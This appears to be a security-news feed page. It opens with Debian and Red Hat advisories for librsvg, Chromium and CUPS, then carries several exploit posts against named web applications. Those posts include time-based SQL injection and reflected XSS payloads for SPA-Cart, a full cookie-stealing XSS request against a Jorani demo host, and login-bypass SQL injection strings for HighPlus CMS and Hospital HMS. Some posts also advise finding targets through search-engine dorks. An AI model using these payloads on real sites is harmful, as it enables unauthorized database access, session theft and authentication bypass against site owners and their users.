Debian Linux Security Advisory 5484-1 - Zac Sims discovered a directory traversal in the URL decoder of librsvg, a SAX-based renderer library for SVG files, which could result in read of arbitrary files when processing a specially crafted SVG file with an include element.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5484-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 27, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librsvgCVE ID         : CVE-2023-38633Debian Bug     : 1041810Zac Sims discovered a directory traversal in the URL decoder of librsvg,a SAX-based renderer library for SVG files, which could result in readof arbitrary files when processing a specially crafted SVG file with aninclude element.For the oldstable distribution (bullseye), this problem has been fixedin version 2.50.3+dfsg-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.54.7+dfsg-1~deb12u1.We recommend that you upgrade your librsvg packages.For the detailed security status of librsvg please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librsvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTrXKhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TYkg//Q+FWCbAqpcLPI+InN0nga0wROM6JVxX3CVPTg6/4U0XKjPRmx4wlX6RvRPk1n4M8I7pjdtXT1PfdVsXpwT1+mFewUkOb4aLkuX5+0NOJbxAS6L6Oo1jNs4r0PJYPcda7edePoIScJ2vH14/yhJs+7ROV3hI0to5CpxT5KejGLTbkhWSs79YMvHxZBPLcSE/NDOCkDzlJ1aVBndmvgqQGujN7hvjynIi8IGEXrPAofqHO1pfVGtBWtK5oajXwxdAU2t0+wy4Lc0U2NPDF6r9QIeZidamJ0yfgPbuiU4WCx1lbkCAMG4Bf6m5S4JqbQmgc+rZCBHy3zaKlipFOEyPe2tfrcvH8zljRXSiKL5P0zMwVeYIRsQj3lUvPge+xV8Gqod99uv4fgN19OWvcP5HOiXxQnkRtReYiQgKut8W0HAXydCsrctAB2XvprYIbsnR1lU8dBAaLqnC/nwrsLVLUv7y1oKDDNjXmNT/aF/ISVF70WVywQK/LbhXIyECoGe+TeoxGjCjT+N/PibL3pMIZ/c8ZLMyH+2+Ad/oD614hPVbe7CUmRCX7Vz2ax8v47b4JY2skki9XdASkKsyvBq9Xus6ZY04D0tTj87wF0Vr4iBAbnFWSJnw2tFVLwn7/ncNkpU/MONR8CAPvhgBc8n/nfF9Fbg6ubEeAHdzlp8EOom8==uwUe-----END PGP SIGNATURE-----

Debian Security Advisory 5484-1

Debian Linux Security Advisory 5483-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5483-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 25, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4427 CVE-2023-4428 CVE-2023-4429 CVE-2023-4430                  CVE-2023-4431Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 116.0.5845.110-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 116.0.5845.110-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTo/EsACgkQEMKTtsN8TjZcVA//SJ88YLHY0KVBwr1CrQJPHHMeP5gyq80A/LRLf7kNco7jcHfZyiR8LB7V4eo62Um8dCpwzSHRqc73Jx580nn5tW310c3C7LQqVPOu0YBmslLkGstXQmR19mHSZkwGGukYMhoNw/ijfAceRjI2ivCnX1MrZyxb6cRH5vJ4Q0KDkSmCi0l2Luv5NHKYTQgprg4u9ls6OtTPu7BiyRClCJmoqrGvizfKSdVjwVdqrckRzZSmKagiXVpsnZacb8LnBluAyUkzPwC+f3Z9RZsDYzC2BeRn6qPhnRCM3C5LWxMAoypoP1Pv15rHz4qQa/pDFl6kiG1W9HD83UgrY0u32MmBgcCoI6c4nQ32Vk3Z+N+ZHO3kECm/Z7mGTLHXrHk4+jgXJV5TE1vnKNypKh7J6JewVFJxMg8Rw4gMRcod3zMNfBe1q9F39NbSRk0F/5LMfTOKZuZmLTuzX/wV3z6B6I1GoFQx7yw9w3vJ9095hdxWxGstedCSv4uinmPfoEzgCiQjRm828sO1Qzfnv+ukgMruhlFc15tbKdLJGu1mflu7AGURs5s1Q1RPMAZbTFcQ8zb7N/PXyiW2VKERuKRKI0+pjLGSoq7W9RU2Er7Mj9huq0T0xpjAkoR1L+nGXvENDNYNg3Yl4eMhHVnP0UzT37F3GEFEfmgAnlL1ziqypGjHvA0==/urs-----END PGP SIGNATURE-----

Debian Security Advisory 5483-1

Red Hat Security Advisory 2023-4769-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security update  
Advisory ID:       RHSA-2023:4769-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4769  
Issue date:        2023-08-28  
CVE Names:         CVE-2023-32360   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: Information leak through Cups-Get-Document operation  
(CVE-2023-32360)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the cupsd service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2230495 - CVE-2023-32360 cups: Information leak through Cups-Get-Document operation

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
cups-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-client-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-devel-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-ipptool-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-lpd-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-printerapp-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm

noarch:  
cups-filesystem-2.3.3op2-13.el9_0.2.noarch.rpm

ppc64le:  
cups-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-client-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-devel-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-ipptool-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-lpd-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-printerapp-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm

s390x:  
cups-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-client-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-devel-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-ipptool-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-lpd-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-printerapp-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm

x86_64:  
cups-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-client-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.i686.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-devel-2.3.3op2-13.el9_0.2.i686.rpm  
cups-devel-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-ipptool-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-lpd-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-printerapp-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
cups-2.3.3op2-13.el9_0.2.src.rpm

aarch64:  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-libs-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-libs-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-libs-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.s390x.rpm

x86_64:  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.i686.rpm  
cups-debugsource-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-libs-2.3.3op2-13.el9_0.2.i686.rpm  
cups-libs-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.i686.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32360  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7LO1AAoJENzjgjWX9erEkbAP/iJ4Vqh2YTPY2HGL2PTbcYQo  
fglvQvVaotbgvno+2tc5BvH0Ho2KEi4BPy3nvJVfvAkltKprHMLqGLowip88+p+K  
iLdfavMahnIJ4kIlGQP/Dr9uia+k4Gw+v4zhhc9ACbev8nTFs9vVEaztAzcPzW+z  
8kH3gN+P1JS1YPc2GJUxVEDlIKt4NGh1sUPiiqik+zv2wTjHxy4IIzBrPa35vSyb  
bpaFDU1O9gtuY+gJ3xEiWK9+KM9Vj8aQLTCFqlj1IovKEyZDWBoQsx2G4ExnMFHX  
i+jFCw7VXB49mBx0MIKXyX3ZTgTN5uC6fGaazJwdOiIAR7eQ09S6uwlp4EqEit2G  
Hz8X7LGi2PwJFFn9WrlRpxTC02drRg1xhBh9ja5BD/MFZr8OlQNPX9JnsX08PCsB  
m8xA+vJMUmPe5H66ebSp9MzRY6hfKyjaDXGU/1VTG7SyZlTEGsSPmjwHyNjJxWMz  
ZXRUj/HONigxiNJJy0blTQ2VMFIN7hSkNODe2h6Qw/FmyK+j4gvCZbECiy58bSfz  
M6dIhMm91EvS4sMDeTUQp71y5VsHUuR65vrCE1sbWYpWXVGH3r2mdYQEyKpHE5qP  
ZxJKt0vTjbMTMYQcnBALjllKUjEkWECV6ZFSioqtGnCqsGAOsDwsQjX6qS03nvR3  
is5AZlVRqb1M3HOobhns  
=pHIv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4769-01

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4548# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /searchGET parameter 'filter[brandid]' is vulnerable to SQL Injectionhttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black---Parameter: filter[brandid] (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black---[-] Done

SPA-Cart eCommerce CMS 1.9.0.3 SQL Injection

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4547# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /searchGET parameter 'filter[brandid]' is vulnerable to XSSGET parameter 'filter[price]' is vulnerable to XSShttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GBXSS Payloads:vnxjb"><script>alert(1)</script>bvu51[-] Done

SPA-Cart eCommerce CMS 1.9.0.3 Cross Site Scripting

Horse Market Sell and Rent Portal Script version 1.5.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Horse Market Sell & Rent Portal Script V1.5.7 xss via file uploads Vulnerability                                   || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725                                     |  | # Dork      : "InfinityMarket MultiPurpose Script is a multi-solution product made with simplicity in mind so you can benefit "  |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  singup your user & go to /index.php/frontend/myprofile/en#content[+]  choose your file svg and upload it .[+]  http://localhost/files/index.svgGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Horse Market Sell And Rent Portal Script 1.5.7 Cross Site Scripting 

Jorani version 1.0.3 suffers from a cross site scripting vulnerability.

    ## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00

Jorani 1.0.3 Cross Site Scripting

HighPlus CMS version 0.1.3 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : HighPlus CMS v0.1.3 Auth By pass Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://highplus.co.th/Highplus/login/AFMADS001.php                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload :  user & pass = ' or 0=0 # [+] http://127.0.0.1wwwhighpluscoth/main/login.htmlGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

HighPlus CMS 0.1.3 SQL Injection

Hospital HMS version 2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ======================================================================================================================================| # Title     : Hospital HMS v2.7 Auth by pass Vulnerability                                                                         || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                              || # Vendor    : http://apptmedical.com/                                                                                              |  | # Dork      : © 2018 HMS. All rights reserved                                                                                      |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : admin & pass = '=' 'or'[+] user login   : http://target_site/hms/user-login.php[+] doctor Login : http://target_site/hms/doctor/[+] admin login  : http://target_site/hms/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Hospital HMS 2.7 SQL Injection

Hospital HMS version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ======================================================================================================================================| # Title     : Hospital HMS v2 auth by pass Vulnerability                                                                           || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                              || # Vendor    : http://p30vel.ir                                                                                                     |  ======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use admin : admin'-- - pass : indoushka[+] http://www127.0.0.1/arvindbijaniyacom/admin/admin_pannel/view_service/index.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Source

Packet Storm